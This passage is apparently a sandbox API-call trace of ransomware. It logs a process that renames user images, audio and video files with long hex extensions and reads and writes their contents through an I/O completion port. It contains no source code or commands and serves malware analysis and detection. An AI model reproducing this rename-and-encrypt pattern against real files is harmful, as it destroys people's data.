lpString2=".435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif.435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif.435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060" [0168.247] GetProcessHeap () returned 0x270000 [0168.247] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb9e0 [0168.247] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x708f9d4, FileInformation=0x42fb9e0, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.250] CloseHandle (hObject=0x5e0) returned 1 [0168.251] GetProcessHeap () returned 0x270000 [0168.253] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7640300 | out: hHeap=0x270000) returned 1 [0168.253] RtlInterlockedCompareExchange64 () returned 0xb [0168.253] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.253] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x750a220, ReturnLength=0x708f9e4) returned 0x0 [0168.254] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png", lpString2=".628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png.628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png.628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E" [0168.254] GetProcessHeap () returned 0x270000 [0168.254] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43326b0 [0168.255] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x708f9d4, FileInformation=0x43326b0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0168.257] CloseHandle (hObject=0x5dc) returned 1 [0168.258] GetProcessHeap () returned 0x270000 [0168.259] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0168.260] RtlInterlockedCompareExchange64 () returned 0xa [0168.260] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, 
lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.260] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7532378, ReturnLength=0x708f9e4) returned 0x0 [0168.261] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png", lpString2=".FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png.FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png.FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854" [0168.261] GetProcessHeap () returned 0x270000 [0168.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x43327e8 [0168.261] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x708f9d4, FileInformation=0x43327e8, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0168.263] CloseHandle (hObject=0x5d8) returned 1 [0168.264] GetProcessHeap () returned 0x270000 [0168.266] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0168.266] RtlInterlockedCompareExchange64 () returned 0x9 [0168.266] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.266] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x755a4d0, ReturnLength=0x708f9e4) returned 0x0 [0168.267] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 
Kw\\BiDOMKYS_7eYkJlO7mV.png", lpString2=".535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png.535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png.535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512" [0168.267] GetProcessHeap () returned 0x270000 [0168.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x4263d40 [0168.267] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x708f9d4, FileInformation=0x4263d40, Length=0x140, FileInformationClass=0xa) returned 0x0 [0168.268] CloseHandle (hObject=0x5d4) returned 1 [0168.269] GetProcessHeap () returned 0x270000 [0168.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0168.281] RtlInterlockedCompareExchange64 () returned 0x8 [0168.281] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.281] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7582628, ReturnLength=0x708f9e4) returned 0x0 [0168.282] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif", lpString2=".AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif.AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 
Kw\\DZm0D9mWkUWh0_9o4.gif.AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600" [0168.282] GetProcessHeap () returned 0x270000 [0168.282] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x4263e88 [0168.282] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x708f9d4, FileInformation=0x4263e88, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.285] CloseHandle (hObject=0x5d0) returned 1 [0168.286] GetProcessHeap () returned 0x270000 [0168.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0168.294] RtlInterlockedCompareExchange64 () returned 0x7 [0168.294] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.294] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x708f9e4) returned 0x0 [0168.295] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif", lpString2=".C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif.C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif.C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44" [0168.295] GetProcessHeap () returned 0x270000 [0168.295] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x74181c0 [0168.296] NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x708f9d4, FileInformation=0x74181c0, Length=0x13a, FileInformationClass=0xa) 
returned 0x0 [0168.298] CloseHandle (hObject=0x5c8) returned 1 [0168.299] GetProcessHeap () returned 0x270000 [0168.300] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0168.302] RtlInterlockedCompareExchange64 () returned 0x6 [0168.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.302] NtQueryObject (in: Handle=0x5c4, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76e1100, ReturnLength=0x708f9e4) returned 0x0 [0168.303] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg", lpString2=".803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg.803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\Rla0Af.jpg.803A669F3E24F0EAB16957AE1B8BC31AF2FD525A2E93A62E7FFC313D7B322464" [0168.303] GetProcessHeap () returned 0x270000 [0168.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332920 [0168.303] NtSetInformationFile (FileHandle=0x5c4, IoStatusBlock=0x708f9d4, FileInformation=0x4332920, Length=0x126, FileInformationClass=0xa) returned 0x0 [0168.305] CloseHandle (hObject=0x5c4) returned 1 [0168.307] GetProcessHeap () returned 0x270000 [0168.308] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0168.310] RtlInterlockedCompareExchange64 () returned 0x5 [0168.310] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, 
lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.310] NtQueryObject (in: Handle=0x5a8, ObjectInformationClass=0x1, ObjectInformation=0x7709258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7709258, ReturnLength=0x708f9e4) returned 0x0 [0168.311] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif", lpString2=".DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif.DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zgyTqIKo7R9.gif.DB124129F02E5693F12DA8176356BFB3EE10162A467B3916B062E6F43BCF0A27" [0168.311] GetProcessHeap () returned 0x270000 [0168.311] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x4332a58 [0168.311] NtSetInformationFile (FileHandle=0x5a8, IoStatusBlock=0x708f9d4, FileInformation=0x4332a58, Length=0x130, FileInformationClass=0xa) returned 0x0 [0168.313] CloseHandle (hObject=0x5a8) returned 1 [0168.313] GetProcessHeap () returned 0x270000 [0168.315] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77091a8 | out: hHeap=0x270000) returned 1 [0168.315] RtlInterlockedCompareExchange64 () returned 0x4 [0168.315] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.315] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x77313b0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x77313b0, ReturnLength=0x708f9e4) returned 0x0 
[0168.318] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif", lpString2=".2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif.2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\zpD0p 1em-JOVM.gif.2E7ADFC8DC619314532D7E4DA7A57BEF85723E07037D370DC52B764DFAF7364D" [0168.318] GetProcessHeap () returned 0x270000 [0168.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x7418308 [0168.318] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x708f9d4, FileInformation=0x7418308, Length=0x136, FileInformationClass=0xa) returned 0x0 [0168.321] CloseHandle (hObject=0x594) returned 1 [0168.322] GetProcessHeap () returned 0x270000 [0168.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7731300 | out: hHeap=0x270000) returned 1 [0168.331] RtlInterlockedCompareExchange64 () returned 0x3 [0168.331] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.331] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x7759508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7759508, ReturnLength=0x708f9e4) returned 0x0 [0168.332] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif", lpString2=".BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif.BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\7g14lH7VgBRylj.gif.BAA0FC1C67472868DA98846A58EADBC93EAF8306C798F0F32A1F2B7FB8260E26" [0168.332] GetProcessHeap () returned 0x270000 [0168.332] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4332b90 [0168.333] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x708f9d4, FileInformation=0x4332b90, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0168.335] CloseHandle (hObject=0x4a8) returned 1 [0168.336] GetProcessHeap () returned 0x270000 [0168.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759458 | out: hHeap=0x270000) returned 1 [0168.340] RtlInterlockedCompareExchange64 () returned 0x2 [0168.341] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.341] WriteFile (in: hFile=0x5e4, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0168.342] RtlInterlockedCompareExchange64 () returned 0x1 [0168.342] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.342] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x75e00f8, ReturnLength=0x708f9e4) returned 0x0 [0168.344] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a", 
lpString2=".3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a.3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\ud8n5jKw.m4a.3980C76C3A3A464114DC41E78D38BAAB1E6292553795014869F4468C62E4CF68" [0168.344] GetProcessHeap () returned 0x270000 [0168.344] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332cc8 [0168.344] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4332cc8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0168.346] CloseHandle (hObject=0x5e4) returned 1 [0168.346] GetProcessHeap () returned 0x270000 [0168.348] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0168.348] RtlInterlockedCompareExchange64 () returned 0x2 [0168.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.350] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x708f9e4) returned 0x0 [0168.351] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav", lpString2=".80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav.80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 
2\\RX0-yPNI7DvLWFXy1\\RGmfEkC6DIb.wav.80AF20C815AAE61E0BB29A88B1B50DD3A123FCEDD31C803E8D1EB9F289D44B7E" [0168.351] GetProcessHeap () returned 0x270000 [0168.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x42fbb28 [0168.351] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x708f9d4, FileInformation=0x42fbb28, Length=0x150, FileInformationClass=0xa) returned 0x0 [0168.354] CloseHandle (hObject=0x58c) returned 1 [0168.355] GetProcessHeap () returned 0x270000 [0168.356] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.356] RtlInterlockedCompareExchange64 () returned 0x1 [0168.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.031] ReadFile (in: hFile=0x58c, lpBuffer=0x7492450, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0169.140] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.140] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x7659508, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7659508, ReturnLength=0x708f9e4) returned 0x0 [0169.277] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi", lpString2=".35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET 
AvuZ8.avi.35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\dXc8SgpPrc-ET AvuZ8.avi.35A8CF3D8EBB64D5611B89658A6B536B535E314DAFCF77B077E779354D39A467" [0169.277] GetProcessHeap () returned 0x270000 [0169.277] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x42586c8 [0169.277] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x708f9d4, FileInformation=0x42586c8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0169.287] CloseHandle (hObject=0x5dc) returned 1 [0169.288] GetProcessHeap () returned 0x270000 [0169.290] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7659458 | out: hHeap=0x270000) returned 1 [0169.293] RtlInterlockedCompareExchange64 () returned 0x1 [0169.293] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0169.295] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0169.316] RtlInterlockedCompareExchange64 () returned 0xffffffff [0169.316] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0170.942] ReadFile (in: hFile=0x5dc, lpBuffer=0x7701188, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0170.956] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, 
lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0170.957] WriteFile (in: hFile=0x58c, lpBuffer=0x752a588*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0170.959] RtlInterlockedCompareExchange64 () returned 0x0 [0170.959] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.606] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0171.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.634] WriteFile (in: hFile=0x600, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0171.827] RtlInterlockedCompareExchange64 () returned 0x2 [0171.827] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0171.827] WriteFile (in: hFile=0x5f0, lpBuffer=0x75526e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75325a8 | out: 
